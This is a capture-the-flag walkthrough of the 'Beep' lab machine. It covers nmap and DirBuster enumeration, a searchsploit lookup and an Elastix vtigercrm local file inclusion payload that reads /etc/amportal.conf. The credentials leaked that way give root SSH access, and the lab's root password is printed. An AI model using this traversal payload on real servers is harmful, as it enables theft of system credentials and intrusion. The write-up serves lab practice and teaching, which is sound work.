Beep box has a very large list of running services, which can be challenging to find the correct exploit method. The beep box may be a little difficult for some as there are a number of potential attack vectors.
We will use the following tools to pawn the box on a Kali Linux box
- NMAP
- Dirbuster
- Searchsploit
- Metasploit
Step 1 – Scanning the network
As an initial step, before the machine is exploited, it needs to be scanned and investigated.
This is important to determine what can be exploited afterwards. It is always better to spend time on this phase to extract maximum informatio.
Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. Raw IP packets are used to determine hosts available on the network, services offered by those hosts, operating systems running, packet filters, firewalls in use, and many other characteristics.
Use the following command to get a basic idea of what we are scanning
nmap -sV -sC -A 10.10.10.7
-sV: Probe open ports to determine service/version info
-sC: Default script sets
-A: Aggressive scan. Enable OS detection, version detection, script scanning, and traceroute
10.10.10.7: IP address of the Beep box
We can see that there are 12 open ports:
Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding.
Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers.
Port 80. Hypertext Transfer Protocol (HTTP). Here it’s an Apache httpd 2.2.3.
Port 110. Post Office Protocol, version 3 (POP3).
Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC).
Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server.
Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS).
Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS).
Port 995. Post Office Protocol 3 over TLS/SSL (POP3S).
Port 3306. MySQL database system.
Port 4445. I2P HTTP/S proxy.
Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port).
Nmap finds quite a long list of services. The target will be Apache, on port 80.
Step 2 – Enumeration of Directories.
I now use DirBuster. DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers.
You can launch DirBuster by typing this command on the terminal
dirbuster
Specify the target URL as 10.10.10.7:80 in the application
I use the directory-list-2.3-medium.txt for this search.
DirBuster finds a huge list of directories with several content management systems and open source applications. There are several vulnerabilities that can lead to shell amongst the results.
Step 3 – Visiting the URL.
Let’s try port 80 and visit http://10.10.10.7
Adding it to the security exception we can visit the address. Elastix login portal opens. Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing.
An IP PBX (“Internet Protocol private branch exchange”) is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business.
Searchsploit, command line tool is used to check the vulnerabilities in Elastix.
The following command is used to get the exploit:
cat user/share/exploitdb/exploits/php/webapps/37937.pl
The LFI exploit is as under:
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).
Step 4 – Trying the Elastix LFI exploit
Let’s navigate to the exploit.
We use the source file to comprehend the contents properly.
Now, we find some usernames and passwords and try to SSH into the network using one of these.
We find that other usernames do not work so we try root to SSH with the following command.
ssh root@10.10.10.7
Try the password jEhdIekWmdjE and Yep! Got an SSH session.
Step 5 – Looking for the root.txt flag
Following command is used to know our location on the machine.
pwd
We are in the root, and by following command
ls
We find the root.txt file.
To read the content of the file the following command is used.
cat root.txt
Step 6 – Looking for the user.txt flag
Now look for flag user.txt
Go to the home directory.
cd home
We found the user.txt file in home>fanis .To read the content of the file following command is used.
type user.txt
Congrats! We found both flags! 😀